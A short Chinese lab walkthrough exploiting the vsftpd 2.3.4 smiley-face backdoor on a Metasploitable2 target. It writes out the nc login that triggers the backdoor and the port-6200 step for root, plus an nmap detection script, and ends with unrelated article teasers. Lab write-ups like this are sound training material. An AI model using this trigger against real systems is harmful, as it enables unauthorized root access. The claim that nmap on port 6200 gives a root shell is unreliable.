张小明
前端开发工程师
一、实验准备:
1、Metaspolitable2(靶机)
2、kali
二、实验步骤:
1、打开kali和靶机,两者都要处于NAT模式
2、在终端使用命令(ip addr)查看kali的ip 然后nmap+kali IP,得到靶机ip
3、执行nmap -sV +(靶机IP)得到端口服务信息
4.手动模拟FTP登录,nc 192.168.61.130 21 回车后输入FTP用户名USER 1:),回车输入密码PASS 123,然后就可以crtl+C退出当前nc连接,注意:用户名一定要带有“:)”这个是触发笑脸漏洞的关键,密码任意都行。
5、nmap 192.168.61.130 -p 6200就可以连接到靶机的后门,拿到root权限。
三、正式的NSE-nmap脚本
针对VSFTPD v2.3.4的检测脚本它的方法为--script加上脚本名即nmap --script ftp-vsftpd-backdoor 192.168.61.130
本文只做分享,不做它用
魔兽争霸III现代化改造:让经典游戏完美适配现代电脑 【免费下载链接】WarcraftHelper Warcraft III Helper , support 1.20e, 1.24e, 1.26a, 1.27a, 1.27b 项目地址: https://gitcode.com/gh_mirrors/wa/WarcraftHelper 还在为魔兽争霸III在新电脑上运行不顺…
李华
Windows DLL注入器Xenos:5分钟快速上手指南 【免费下载链接】Xenos Windows dll injector 项目地址: https://gitcode.com/gh_mirrors/xe/Xenos Xenos是一款功能强大的Windows动态链接库注入工具,专为开发者和安全研究人员设计。无论你是进行软件…
李华
Dify平台的广告口号生成创意指数排名 在品牌营销日益依赖内容创新的今天,一条出彩的广告口号往往能撬动巨大的市场价值。然而,传统创意生产模式高度依赖人力、周期长、主观性强,难以满足快速迭代的市场需求。随着大语言模型(LLM&…
李华
Dify在DevOps自动化文档生成中的集成方案背景与挑战:当AI遇上DevOps,文档还能靠人写吗? 在现代软件交付节奏下,一个功能从开发到上线可能只需几小时。但技术文档呢?往往滞后数天甚至被遗忘。这并非团队不重视——而是现…
李华
社交媒体优化:解锁网络营销新潜力 1. 社交媒体与社交网络概述 如今,询问任何一个 10 岁以上的孩子关于 MySpace 的情况,你都会得到相当不错的描述。在交流过程中,你可能还会听到诸如 Flickr、Facebook、ShoutLife、YouTube、Twitter 和 Jaiku 等平台。这些都是过去几年在…
李华
目录 第一阶段:基础构建 (The Foundation) 第二阶段:OOP 三大支柱 (The Three Pillars) 第三阶段:工厂与构造技巧 (Creation & Structure) 第四阶段:Pythonic 黑魔法 (Advanced Magic) 👑 终极代码汇总&#…
李华